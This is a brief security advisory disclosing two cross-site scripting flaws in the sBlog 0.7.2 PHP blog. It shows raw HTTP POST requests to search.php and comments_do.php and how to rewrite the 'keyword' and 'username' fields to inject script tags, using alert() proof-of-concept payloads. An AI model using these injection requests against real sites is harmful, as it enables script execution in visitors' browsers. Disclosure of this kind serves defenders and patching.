sBlog_0.72_xss.txt

`sBlog 0.7.2 <== Multiple Cross-Site Scripting Vulnerability  
  
===================================  
  
Information of Software:  
  
Software: sBlog 0.7.2  
Site: http://servous.se/  
Description: sBlog is a simple and new PHP Blog. Is very very simple   
and it's use by newbie of PHP.  
  
===================================  
  
Bug:  
  
1) Cross-Site Scripting Vulnearbility in the page search.php  
  
sBlog contains a flaw that allows a remote cross site scripting attack.   
The vulnerability is found in search method and the user can modify   
the function GET and insert the XSS code  
  
- HTTP Normal POST Request  
  
http://[target]/[patch]/search.php  
POST /[patch]/search.php HTTP/1.1  
Host: [target]  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7  
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5  
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: http://[target]/[patch]/search.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 12  
keyword=casa  
  
- End of Normal POST Request  
  
but we can modify the request POST in this way:  
  
[....]  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 58  
keyword=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E  
[....]  
  
---------------------------------------------------------  
  
PoC for the first vulnerability:  
  
you can insert in the search textbox the key <script>alert("lol");</script> for  
execute an XSS attack.  
  
###########################################  
  
2) Cross-Site Scripting Vulnearbility in the name of user post comment  
  
With this vulnerability can be exploited by malicious people to conduct   
script insertion attacks.  
Input passed to the "title" field when editing submitted articles and   
reportedly also when commenting on articles isn't properly sanitised   
before being used. This can be   
exploited to inject arbitrary HTML and script code, which will be executed in   
a user's browser session in context of an affected site when the malicious user   
data is viewed.  
  
- HTTP Normal POST Request  
  
http://[target]/[patch]/comments_do.php  
POST [patch]/comments_do.php HTTP/1.1  
Host: [target]  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7  
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5  
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: http://[target]/[patch]/comments.php?id=news_id  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 53  
blog_id=id_of_news&username=Test&email=&homepage=&comment=Test  
  
but we can modify the variable &username in the request POST in this way:  
  
[....]  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 99  
blog_id=3&username=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&email=&homepage=&comment=test  
[....]  
  
---------------------------------------------------------  
  
PoC for the second vulnerability:  
  
you can insert in the name textbox of user comment an XSS code for  
execute an cross-site scripting attack, or an HTML code  
  
===================================  
  
Credit:  
  
Author: Kiki  
e-mail: [email protected]  
web page: http://kiki91.altervista.org and http://blackzero.netsons.org  
  
===================================  
`